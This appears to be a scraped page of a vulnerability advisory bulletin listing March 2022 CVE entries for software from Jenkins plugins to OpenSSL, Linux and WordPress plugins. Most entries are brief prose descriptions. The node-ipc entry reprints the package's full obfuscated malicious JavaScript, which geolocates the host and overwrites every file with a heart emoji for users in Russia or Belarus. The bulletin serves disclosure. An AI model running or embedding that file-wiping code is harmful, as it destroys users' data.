Jenkins Vmware vRealize CodeStream Plugin 1.2 and earlier stores passwords unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system.2022-03-15not yet calculatedCVE-2022-27217
CONFIRM
MLIST
kingsoft -- internet_security_9_plus
 
The kernel mode driver kwatch3 of KINGSOFT Internet Security 9 Plus Version 2010.06.23.247 fails to properly handle crafted inputs, leading to stack-based buffer overflow.2022-03-17not yet calculatedCVE-2022-25949
JVN
CONFIRM
kunze_law -- kunze_law
 
The Kunze Law WordPress plugin before 2.1 does not escape its 'E-Mail Error "From" Address' settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed2022-03-14not yet calculatedCVE-2022-0674
MISC
libnested -- libnested
 
The package libnested before 1.5.2 are vulnerable to Prototype Pollution via the set function in index.js. **Note:** This vulnerability derives from an incomplete fix for [CVE-2020-28283](https://security.snyk.io/vuln/SNYK-JS-LIBNESTED-1054930)2022-03-17not yet calculatedCVE-2022-25352
MISC
MISC
MISC
libvcs -- libvcs
 
The package libvcs before 0.11.1 are vulnerable to Command Injection via argument injection. When calling the update_repo function (when using hg), the url parameter is passed to the hg clone command. By injecting some hg options it was possible to get arbitrary command execution.2022-03-14not yet calculatedCVE-2022-21187
MISC
MISC
MISC
ligeo_archives -- ligeo_basics
 
Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features.2022-03-17not yet calculatedCVE-2021-46107
MISC
MISC
linux -- linux_kernel
 
In the Linux kernel before 5.15.3, fs/quota/quota_tree.c does not validate the block number in the quota tree (on disk). This can, for example, lead to a kernel/locking/rwsem.c use-after-free if there is a corrupted quota file.2022-03-18not yet calculatedCVE-2021-45868
MISC
MISC
MISC
MISC
MISC
linux -- linux_kernel
 
Memory leak in icmp6 implementation in Linux Kernel 5.13+ allows a remote attacker to DoS a host by making it go out-of-memory via icmp6 packets of type 130 or 131. We recommend upgrading past commit 2d3916f3189172d5c69d33065c3c21119fe539fc.2022-03-18not yet calculatedCVE-2022-0742
MISC
MISC
linux -- linux_kernel
 
A flaw use after free in the Linux kernel FUSE filesystem was found in the way user triggers write(). A local user could use this flaw to get some unauthorized access to some data from the FUSE filesystem and as result potentially privilege escalation too.2022-03-18not yet calculatedCVE-2022-1011
MISC
FEDORA
FEDORA
linux -- linux_kernel
 
In drivers/usb/gadget/udc/udc-xilinx.c in the Linux kernel before 5.16.12, the endpoint index is not validated and might be manipulated by the host for out-of-array access.2022-03-16not yet calculatedCVE-2022-27223
MISC
MISC
login_with_phone_number -- login_with_phone_number
 
The Login with phone number WordPress plugin before 1.3.7 includes a file delete.php with no form of authentication or authorization checks placed in the plugin directory, allowing unauthenticated user to remotely delete the plugin files leading to a potential Denial of Service situation.2022-03-14not yet calculatedCVE-2022-0593
MISC
MISC
maccms -- maccms
 
There is a stored Cross Site Scripting (XSS) vulnerability in maccms v10 through adding videos. XSS code can be inserted at parameter positions including name and remarks.2022-03-16not yet calculatedCVE-2021-45787
MISC
maccms -- maccms
 
In maccms v10, an attacker can log in through /index.php/user/login in the "col" and "openid" parameters to gain privileges.2022-03-16not yet calculatedCVE-2021-45786
MISC
master_addons_for_elementor -- master_addons_for_elementor
 
The Master Addons for Elementor WordPress plugin before 1.8.5 does not sanitise and escape the error_message parameter before outputting it back in the response of the jltma_restrict_content AJAX action, available to unauthenticated and authenticated users, leading to a Reflected Cross-Site Scripting2022-03-14not yet calculatedCVE-2022-0327
MISC
mattermost -- mattermost
 
One of the API in Mattermost version 6.3.0 and earlier fails to properly protect the permissions, which allows the system administrators to combine the two distinct privileges/capabilities in a way that allows them to override certain restricted configurations like EnableUploads.2022-03-18not yet calculatedCVE-2022-1003
MISC
mattermost -- mattermost
 
Mattermost 6.3.0 and earlier fails to properly sanitize the HTML content in the email invitation sent to guest users, which allows registered users with special permissions to invite guest users to inject unescaped HTML content in the email invitations.2022-03-18not yet calculatedCVE-2022-1002
MISC
MISC
maxgalleria -- maxgalleria
 
Authenticated (author or higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in MaxGalleria WordPress plugin (versions 6.2.5).2022-03-18not yet calculatedCVE-2022-25603
CONFIRM
CONFIRM
meks_easy_photo_feed_widget -- meks_easy_photo_feed_widget
 
The Meks Easy Photo Feed Widget WordPress plugin before 1.2.4 does not have capability and CSRF checks in the meks_save_business_selected_account AJAX action, available to any authenticated user, and does not escape some of the settings. As a result, any authenticated user, such as subscriber could update the plugin's settings and put Cross-Site Scripting payloads in them2022-03-14not yet calculatedCVE-2021-24958
MISC
microweber -- microweber
 
The microweber application allows large characters to insert in the input field "post title" which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. in GitHub repository microweber/microweber prior to 1.2.12.2022-03-15not yet calculatedCVE-2022-0961
CONFIRM
MISC
microweber -- microweber
 
Unrestricted XML Files Leads to Stored XSS in GitHub repository microweber/microweber prior to 1.2.12.2022-03-15not yet calculatedCVE-2022-0963
CONFIRM
MISC
microweber -- microweber
 
The microweber application allows large characters to insert in the input field "fist & last name" which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. in microweber/microweber in GitHub repository microweber/microweber prior to 1.2.12.2022-03-15not yet calculatedCVE-2022-0968
CONFIRM
MISC
microweber -- microweber
 
Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11.2022-03-15not yet calculatedCVE-2022-0954
MISC
CONFIRM
mikrotik -- products
 
In the SCEP Server of RouterOS in certain Mikrotik products, an attacker can trigger a heap-based buffer overflow that leads to remote code execution. The attacker must control the SCEP server for a valid certificate. This affects mikrotik-vm-6.46, mikrotik-vm-6.46.8, mikrotik-tile-6.46.8, mikrotik-6.47.9, and mikrotik-6.47.10.2022-03-16not yet calculatedCVE-2021-41987
MISC
MISC
mimecast -- email_security
 
Mimecast Email Security before 2020-01-10 allows any admin to spoof any domain, and pass DMARC alignment via SPF. This occurs through misuse of the address rewrite feature. (The domain being spoofed must be a customer in the Mimecast grid from which the spoofing occurs.)2022-03-16not yet calculatedCVE-2020-36519
MISC
minimist -- minimist
 
Minimist <=1.2.5 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95).2022-03-17not yet calculatedCVE-2021-44906
MISC
MISC
MISC
MISC
MISC
misp -- mispAn issue was discovered in MISP before 2.4.156. app/Model/Server.php does not restrict generateServerSettings to the CLI. This could lead to SSRF.2022-03-18not yet calculatedCVE-2022-27245
MISC
misp -- mispAn issue was discovered in MISP before 2.4.156. A malicious site administrator could store an XSS payload in the custom auth name. This would be executed each time the administrator modifies a user.2022-03-18not yet calculatedCVE-2022-27244
MISC
misp -- mispAn issue was discovered in MISP before 2.4.156. app/View/Users/terms.ctp allows Local File Inclusion via the custom terms file setting.2022-03-18not yet calculatedCVE-2022-27243
MISC
misp -- misp
 
An issue was discovered in MISP before 2.4.156. An SVG org logo (which may contain JavaScript) is not forbidden by default.2022-03-18not yet calculatedCVE-2022-27246
MISC
multisite_content_copier/updater -- multisite_content_copier/updater
 
The WordPress Multisite Content Copier/Updater WordPress plugin before 2.1.2 does not sanitise and escape the s parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue in the network dashboard2022-03-14not yet calculatedCVE-2022-0503
MISC
netgear -- netgearA vulnerability is in the 'BRS_top.html' page of the Netgear W104, version WAC104-V1.0.4.13, which can allow a remote attacker to access this page without any authentication. When processed, it exposes firmware version information for the device.2022-03-17not yet calculatedCVE-2021-44261
MISC
MISC
netgear -- netgear
 
A vulnerability is in the 'MNU_top.htm' page of the Netgear W104, version WAC104-V1.0.4.13, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information for the device.2022-03-17not yet calculatedCVE-2021-44262
MISC
MISC
netgear -- routers
 
A stack overflow vulnerability exists in the upnpd service in Netgear EX6100v1 201.0.2.28, CAX80 2.1.2.6, and DC112A 1.0.0.62, which may lead to the execution of arbitrary code without authentication.2022-03-18not yet calculatedCVE-2022-24655
MISC
MISC
MISC
nicotine+ -- nicotine+
 
Denial of service (DoS) vulnerability in Nicotine+ 3.0.3 and later allows a user with a modified Soulseek client to crash Nicotine+ by sending a file download request with a file path containing a null character.2022-03-15not yet calculatedCVE-2021-45848
MISC
node-imdb -- node-imdb
 
The package node-lmdb before 0.9.7 are vulnerable to Denial of Service (DoS) when defining a non-invokable ToString value, which will cause a crash during type check.2022-03-16not yet calculatedCVE-2022-21164
MISC
MISC
node-ipc -- node-ipc
 
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ?? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };2022-03-16not yet calculatedCVE-2022-23812
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
nvidia -- flare
 
NVIDIA FLARE contains a vulnerability in the admin interface, where an un-authorized attacker can cause Allocation of Resources Without Limits or Throttling, which may lead to cause system unavailable.2022-03-17not yet calculatedCVE-2022-21822
MISC
online_admission_system -- online_admission_system
 
The Online Admission System 1.0 allows an unauthenticated attacker to upload or transfer files of dangerous types to the application through documents.php, which may be used to execute malicious code or lead to code execution.2022-03-18not yet calculatedCVE-2021-45835
MISC
MISC
MISC
online_banking_system -- online_banking_system
 
Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via staff_login.php.2022-03-15not yet calculatedCVE-2022-25494
MISC
online_project_time_management_system -- online_project_time_management_systemOnline Project Time Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in the function save_employee at /ptms/classes/Users.php.2022-03-16not yet calculatedCVE-2022-26293
MISC
MISC
online_project_time_management_system -- online_project_time_management_system
 
A stored cross-site scripting (XSS) vulnerability in /ptms/?page=user of Online Project Time Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the user name field.2022-03-16not yet calculatedCVE-2022-26295
MISC
open_web_analytics -- open_web_analytics
 
Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.2022-03-18not yet calculatedCVE-2022-24637
MISC
CONFIRM
opendocman -- opendocman
 
An attacker can upload or transfer files of dangerous types to the OpenDocMan 1.4.4 portal via add.php using MIME-bypass, which may be automatically processed within the product's environment or lead to arbitrary code execution.2022-03-18not yet calculatedCVE-2021-45834
MISC
MISC
MISC
MISC
openexr -- multipart_input_file
 
A flaw was found in OpenEXR's Multipart input file functionality. A crafted multi-part input file with no actual parts can trigger a NULL pointer dereference. The highest threat from this vulnerability is to system availability.2022-03-16not yet calculatedCVE-2021-20299
MISC
MISC
MISC
openssl -- openssl
 
The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).2022-03-15not yet calculatedCVE-2022-0778
CONFIRM
CONFIRM
CONFIRM
CONFIRM
DEBIAN
MLIST
MLIST
opensuse -- factory
 
A Improper Privilege Management vulnerability in the sudoers configuration in cscreen of openSUSE Factory allows any local users to gain the privileges of the tty and dialout groups and access and manipulate any running cscreen seesion. This issue affects: openSUSE Factory cscreen version 1.2-1.3 and prior versions.2022-03-16not yet calculatedCVE-2022-21946
CONFIRM
opensuse -- factory
 
A Insecure Temporary File vulnerability in cscreen of openSUSE Factory allows local attackers to cause DoS for cscreen and a system DoS for non-default systems. This issue affects: openSUSE Factory cscreen version 1.2-1.3 and prior versions.2022-03-16not yet calculatedCVE-2022-21945
CONFIRM
openvpn -- openvpn
 
OpenVPN 2.1 until v2.4.12 and v2.5.6 may enable authentication bypass in external authentication plug-ins when more than one of them makes use of deferred authentication replies, which allows an external user to be granted access with only partially correct credentials.2022-03-18not yet calculatedCVE-2022-0547
MISC
MISC
MISC
paramiko -- paramiko
 
In Paramiko before 2.10.1, a race condition (between creation and chmod) in the write_private_key_file function could allow unauthorized information disclosure.2022-03-17not yet calculatedCVE-2022-24302
MISC
MISC
pascom -- cloud_phone_systemAn issue was discovered in Pascom Cloud Phone System before 7.20.x. A configuration error between NGINX and a backend Tomcat server leads to a path traversal in the Tomcat server, exposing unintended endpoints.2022-03-18not yet calculatedCVE-2021-45967
MISC
MISC
MISC
MISC
pascom -- cloud_phone_systemAn issue was discovered in xmppserver jar in the XMPP Server component of the JIve platform, as used in Pascom Cloud Phone System before 7.20.x (and in other products). An endpoint in the backend Tomcat server of the Pascom allows SSRF, a related issue to CVE-2019-18394.2022-03-18not yet calculatedCVE-2021-45968
MISC
MISC
MISC
MISC
MISC
pascom -- cloud_phone_system
 
An issue was discovered in Pascom Cloud Phone System before 7.20.x. In the management REST API, /services/apply in exd.pl allows remote attackers to execute arbitrary code via shell metacharacters.2022-03-18not yet calculatedCVE-2021-45966
MISC
MISC
MISC
petfinder_listings -- petfinder_listings
 
The Petfinder Listings WordPress plugin through 1.0.18 does not escape its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed2022-03-14not yet calculatedCVE-2022-0702
MISC
pgadmin_4 -- pgadmin_4
 
When run in server mode, pgAdmin 4 allows users to store files on the server under individual storage directories. Files such as SQL scripts may be uploaded through the user interface. The URI to which upload requests are made fails to validate the upload path to prevent path traversal techniques being used to store files outside of the storage directory. A malicious, but authorised and authenticated user can construct an HTTP request using their existing CSRF token and session cookie to manually upload files to any location that the operating system user account under which pgAdmin is running has permission to write.2022-03-16not yet calculatedCVE-2022-0959
MISC
php -- php
 
A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Attendance and Payroll System v1.0 which allows an unauthenticated remote attacker to upload a maliciously crafted PHP via photo upload.2022-03-17not yet calculatedCVE-2021-44087
MISC
MISC
MISC
pimcore -- pimcoreCross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.4.0.2022-03-15not yet calculatedCVE-2022-0894
CONFIRM
MISC
pimcore -- pimcoreCross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.4.0.2022-03-16not yet calculatedCVE-2022-0911
CONFIRM
MISC
pimcore -- pimcore
 
Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.4.0.2022-03-16not yet calculatedCVE-2022-0704
CONFIRM
MISC
pimcore -- pimcore
 
Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.4.0.2022-03-16not yet calculatedCVE-2022-0705
CONFIRM
MISC
pimcore -- pimcore
 
Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.4.0.2022-03-15not yet calculatedCVE-2022-0893
CONFIRM
MISC
piwigo -- piwigo
 
Piwigo v12.2.0 was discovered to contain a SQL injection vulnerability via pwg.users.php.2022-03-18not yet calculatedCVE-2022-26266
MISC
piwigo -- piwigo
 
Piwigo v12.2.0 was discovered to contain an information leak via the action parameter in /admin/maintenance_actions.php.2022-03-18not yet calculatedCVE-2022-26267
MISC
post-loader -- post-loader
 
The package post-loader from 0.0.0 are vulnerable to Arbitrary Code Execution which uses a markdown parser in an unsafe way so that any javascript code inside the markdown input files gets evaluated and executed.2022-03-17not yet calculatedCVE-2022-0748
MISC
price_table -- price_table
 
Authenticated (contributor of higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in WordPress Price Table plugin (versions <= 0.2.2).2022-03-18not yet calculatedCVE-2022-25604
CONFIRM
CONFIRM
projectworlds -- hospital_management_system
 
An issue was discovered in Projectworlds Hospital Management System v1.0. Unauthorized malicious attackers can add patients without restriction via add_patient.php.2022-03-16not yet calculatedCVE-2021-45852
MISC
prototype_pollution -- prototype_pollution
 
The package set-in before 2.0.3 are vulnerable to Prototype Pollution via the setIn method, as it allows an attacker to merge object prototypes into it. **Note:** This vulnerability derives from an incomplete fix of [CVE-2020-28273](https://security.snyk.io/vuln/SNYK-JS-SETIN-1048049)2022-03-17not yet calculatedCVE-2022-25354
MISC
MISC
MISC
qemu -- e1000_nic_emulator
 
An infinite loop flaw was found in the e1000 NIC emulator of the QEMU. This issue occurs while processing transmits (tx) descriptors in process_tx_desc if various descriptor fields are initialized with invalid values. This flaw allows a guest to consume CPU cycles on the host, resulting in a denial of service. The highest threat from this vulnerability is to system availability.2022-03-16not yet calculatedCVE-2021-20257
MISC
MISC
MISC
MISC
qemu -- vhost-vsock_device
 
A flaw was found in the vhost-vsock device of QEMU. In case of error, an invalid element was not detached from the virtqueue before freeing its memory, leading to memory leakage and other unexpected results. Affected QEMU versions <= 6.2.0.2022-03-16not yet calculatedCVE-2022-26354
MISC
qemu -- virtio-net_device
 
A flaw was found in the virtio-net device of QEMU. This flaw was inadvertently introduced with the fix for CVE-2021-3748, which forgot to unmap the cached virtqueue elements on error, leading to memory leakage and other unexpected results. Affected QEMU version: 6.2.0.2022-03-16not yet calculatedCVE-2022-26353
MISC
qs -- qs
 
A Denial of Service vulnerability exists in qs up to 6.8.0 due to insufficient sanitization of property in the gs.parse function. The merge() function allows the assignment of properties on an array in the query. For any property being assigned, a value in the array is converted to an object containing these properties. Essentially, this means that the property whose expected type is Array always has to be checked with Array.isArray() by the user. This may not be obvious to the user and can cause unexpected behavior.2022-03-17not yet calculatedCVE-2021-44907
MISC
MISC
MISC
MISC
quake -- quake
 
The package guake before 3.8.5 are vulnerable to Exposed Dangerous Method or Function due to the exposure of execute_command and execute_command_by_uuid methods via the d-bus interface, which makes it possible for a malicious user to run an arbitrary command via the d-bus method. **Note:** Exploitation requires the user to have installed another malicious program that will be able to send dbus signals or run terminal commands.2022-03-17not yet calculatedCVE-2021-23556
MISC
MISC
MISC
MISC
MISC
rambus_safezone -- basic_crypto_module
 
The Rambus SafeZone Basic Crypto Module before 10.4.0, as used in certain Fujifilm (formerly Fuji Xerox) devices before 2022-03-01, Canon imagePROGRAF and imageRUNNER devices through 2022-03-14, and potentially many other devices, generates RSA keys that can be broken with Fermat's factorization method. This allows efficient calculation of private RSA keys from the public key of a TLS certificate.2022-03-14not yet calculatedCVE-2022-26320
MISC
CONFIRM
MISC
MISC
rapid7 -- insight_agent
 
Rapid7 Insight Agent versions 3.1.2.38 and earlier suffer from a privilege escalation vulnerability, whereby an attacker can hijack the flow of execution due to an unquoted argument to the runas.exe command used by the ir_agent.exe component, resulting in elevated rights and persistent access to the machine. This issue was fixed in Rapid7 Insight Agent version 3.1.3.80.2022-03-17not yet calculatedCVE-2022-0237
CONFIRM
MISC
rapid7 -- nexpose
 
Rapid7 Nexpose versions 6.6.93 and earlier are susceptible to an SQL Injection vulnerability, whereby valid search operators are not defined. This lack of validation can allow an attacker to manipulate the "ANY" and "OR" operators in the SearchCriteria and inject SQL code. This issue was fixed in Rapid7 Nexpose version 6.6.129.2022-03-17not yet calculatedCVE-2022-0757
CONFIRM
rapid7 -- nexpose
 
Rapid7 Nexpose versions 6.6.129 and earlier suffer from a reflected cross site scripting vulnerability, within the shared scan configuration component of the tool. With this vulnerability an attacker could pass literal values as the test credentials, providing the opportunity for a potential XSS attack. This issue is fixed in Rapid7 Nexpose version 6.6.130.2022-03-17not yet calculatedCVE-2022-0758
CONFIRM
responsive_menu -- responsive_menu
 
Nonce token leak vulnerability leading to arbitrary file upload, theme deletion, plugin settings change discovered in Responsive Menu WordPress plugin (versions <= 4.1.7).2022-03-18not yet calculatedCVE-2022-25602
CONFIRM
CONFIRM
rockwell_automation -- isagraf_runtimeRockwell Automation ISaGRAF Runtime Versions 4.x and 5.x includes the functionality of setting a password that is required to execute privileged commands. The password value passed to ISaGRAF Runtime is the result of encryption performed with a fixed key value using the tiny encryption algorithm (TEA) on an entered or saved password. A remote, unauthenticated attacker could pass their own encrypted password to the ISaGRAF 5 Runtime, which may result in information disclosure on the device.2022-03-18not yet calculatedCVE-2020-25180
CONFIRM
CONFIRM
CONFIRM
CONFIRM
rockwell_automation -- isagraf_runtimeRockwell Automation ISaGRAF Runtime Versions 4.x and 5.x stores the password in plaintext in a file that is in the same directory as the executable file. ISaGRAF Runtime reads the file and saves the data in a variable without any additional modification. A local, unauthenticated attacker could compromise the user passwords, resulting in information disclosure.2022-03-18not yet calculatedCVE-2020-25184
CONFIRM
CONFIRM
CONFIRM
CONFIRM
rockwell_automation -- isagraf_runtimeRockwell Automation ISaGRAF Runtime Versions 4.x and 5.x searches for and loads DLLs as dynamic libraries. Uncontrolled loading of dynamic libraries could allow a local, unauthenticated attacker to execute arbitrary code. This vulnerability only affects ISaGRAF Runtime when running on Microsoft Windows systems.2022-03-18not yet calculatedCVE-2020-25182
CONFIRM
CONFIRM
CONFIRM
CONFIRM
rockwell_automation -- isagraf_runtimeISaGRAF Workbench communicates with Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x using TCP/IP. This communication protocol provides various file system operations, as well as the uploading of applications. Data is transferred over this protocol unencrypted, which could allow a remote unauthenticated attacker to upload, read, and delete files.2022-03-18not yet calculatedCVE-2020-25178
CONFIRM
CONFIRM
CONFIRM
CONFIRM
rockwell_automation -- isagraf_runtime
 
Some commands used by the Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x eXchange Layer (IXL) protocol perform various file operations in the file system. Since the parameter pointing to the file name is not checked for reserved characters, it is possible for a remote, unauthenticated attacker to traverse an application’s directory, which could lead to remote code execution.2022-03-18not yet calculatedCVE-2020-25176
CONFIRM
CONFIRM
CONFIRM
CONFIRM
runasspc -- runasspc
 
RunAsSpc 4.0 uses a universal and recoverable encryption key. In possession of a file encrypted by RunAsSpc, an attacker can recover the credentials that were used.2022-03-16not yet calculatedCVE-2022-26660
MISC
sailsjs -- sail.js
 
SailsJS Sails.js <=1.4.0 is vulnerable to Prototype Pollution via controller/load-action-modules.js, function loadActionModules().2022-03-17not yet calculatedCVE-2021-44908
MISC
MISC
MISC
samba -- sambaKerberos acceptors need easy access to stable AD identifiers (eg objectSid). Samba as an AD DC now provides a way for Linux applications to obtain a reliable SID (and samAccountName) in issued tickets.2022-03-16not yet calculatedCVE-2020-25721
MISC
MISC
MISC
secure_mobile_access -- 100_series_products
 
** UNSUPPORTED WHEN ASSIGNED ** Improper neutralization of Special Elements leading to OS Command Injection vulnerability impacting end-of-life Secure Remote Access (SRA) products and older firmware versions of Secure Mobile Access (SMA) 100 series products, specifically the SRA appliances running all 8.x, 9.0.0.5-19sv and earlier versions and Secure Mobile Access (SMA) 100 series products running older firmware 9.0.0.9-26sv and earlier versions.2022-03-17not yet calculatedCVE-2022-22273
CONFIRM
seo_301_meta -- seo_301_meta
 
The SEO 301 Meta WordPress plugin through 1.9.1 does not escape its Request and Destination settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed2022-03-14not yet calculatedCVE-2022-0701
MISC
simple_quotation -- simple_quotationThe Simple Quotation WordPress plugin through 1.3.2 does not have authorisation (and CSRF) checks in various of its AJAX actions and is lacking escaping of user data when using it in SQL statements, allowing any authenticated users, such as subscriber to perform SQL injection attacks2022-03-14not yet calculatedCVE-2022-22735
MISC
simple_quotation -- simple_quotation
 
The Simple Quotation WordPress plugin through 1.3.2 does not have CSRF check when creating or editing a quote and does not sanitise and escape Quotes. As a result, attacker could make a logged in admin create or edit arbitrary quote, and put Cross-Site Scripting payloads in them2022-03-14not yet calculatedCVE-2022-22734
MISC
simple_tracking -- simple_tracking
 
The Simple Tracking WordPress plugin before 1.7 does not sanitise and escape its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed2022-03-14not yet calculatedCVE-2022-0700
MISC
singoocms -- singoocms
 
This affects all versions of package SinGooCMS.Utility. The socket client in the package can pass in the payload via the user-controllable input after it has been established, because this socket client transmission does not have the appropriate restrictions or type bindings for the BinaryFormatter.2022-03-17not yet calculatedCVE-2022-0749
MISC
MISC
MISC
slims8 -- akasia
 
Slims8 Akasia 8.3.1 is affected by SQL injection in /admin/modules/bibliography/index.php, /admin/modules/membership/member_type.php, /admin/modules/system/user_group.php, and /admin/modules/membership/index.php through the dir parameter. It can be used by remotely authenticated librarian users.2022-03-17not yet calculatedCVE-2021-45791
MISC
slims9 -- bulianSlims9 Bulian 9.4.2 is affected by SQL injection in /admin/modules/system/backup.php. User data can be obtained.2022-03-17not yet calculatedCVE-2021-45794
MISC
slims9 -- bulianSlims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained.2022-03-17not yet calculatedCVE-2021-45793
MISC
slims9 -- bulian
 
Slims9 Bulian 9.4.2 is affected by Cross Site Scripting (XSS) in /admin/modules/system/custom_field.php.2022-03-17not yet calculatedCVE-2021-45792
MISC
snapcenter -- snapcenter
 
SnapCenter versions prior to 4.5 are susceptible to a vulnerability which could allow a local authenticated attacker to discover plaintext HANA credentials.2022-03-16not yet calculatedCVE-2022-23234
MISC
sonatype -- nexus_repository_manager
 
Sonatype Nexus Repository Manager 3.36.0 allows HTML Injection.2022-03-17not yet calculatedCVE-2021-43961
MISC
MISC
sourcecodester -- attendance_and_payroll_system
 
An SQL Injection vulnerability exists in Sourcecodester Attendance and Payroll System v1.0 which allows a remote attacker to bypass authentication via unsanitized login parameters.2022-03-17not yet calculatedCVE-2021-44088
MISC
MISC
MISC
spatie -- media-library-pro_library
 
The Spatie media-library-pro library through 1.17.10 and 2.x through 2.1.6 for Laravel allows remote attackers to upload executable files via the uploads route.2022-03-17not yet calculatedCVE-2021-45040
MISC
MISC
sqlpad -- sqlpad
 
Template injection in connection test endpoint leads to RCE in GitHub repository sqlpad/sqlpad prior to 6.10.1.2022-03-15not yet calculatedCVE-2022-0944
CONFIRM
MISC
star7th -- showdocUnrestricted Upload of File with Dangerous Type in GitHub repository star7th/showdoc prior to 2.10.4.2022-03-15not yet calculatedCVE-2022-0950
CONFIRM
MISC
star7th -- showdocStored XSS viva .webmv file upload in GitHub repository star7th/showdoc prior to 2.10.4.2022-03-15not yet calculatedCVE-2022-0964
MISC
CONFIRM
star7th -- showdocStored XSS via File Upload in GitHub repository star7th/showdoc prior to 2.10.4.2022-03-15not yet calculatedCVE-2022-0957
CONFIRM
MISC
star7th -- showdocStored XSS via File Upload in GitHub repository star7th/showdoc prior to v.2.10.4.2022-03-15not yet calculatedCVE-2022-0956
MISC
CONFIRM
star7th -- showdocStored XSS via File Upload in star7th/showdoc in star7th/showdoc in GitHub repository star7th/showdoc prior to 2.10.4.2022-03-15not yet calculatedCVE-2022-0967
MISC
CONFIRM
star7th -- showdocStored XSS viva .ofd file upload in GitHub repository star7th/showdoc prior to 2.10.4.2022-03-15not yet calculatedCVE-2022-0965
MISC
CONFIRM
